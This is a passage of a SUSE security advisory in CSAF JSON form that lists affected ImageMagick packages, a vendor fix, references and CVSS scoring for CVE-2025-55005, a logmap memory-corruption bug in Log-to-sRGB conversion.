"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "moderate"
}
],
"title": "CVE-2025-55004"
},
{
"cve": "CVE-2025-55005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55005"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-1, when preparing to transform from Log to sRGB colorspaces, the logmap construction fails to handle cases where the reference-black or reference-white value is larger than 1024. This leads to corrupting memory beyond the end of the allocated logmap buffer. This issue has been patched in version 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55005",
"url": "https://www.suse.com/security/cve/CVE-2025-55005"
},
{
"category": "external",
"summary": "SUSE Bug 1248077 for CVE-2025-55005",
"url": "https://bugzilla.suse.com/1248077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
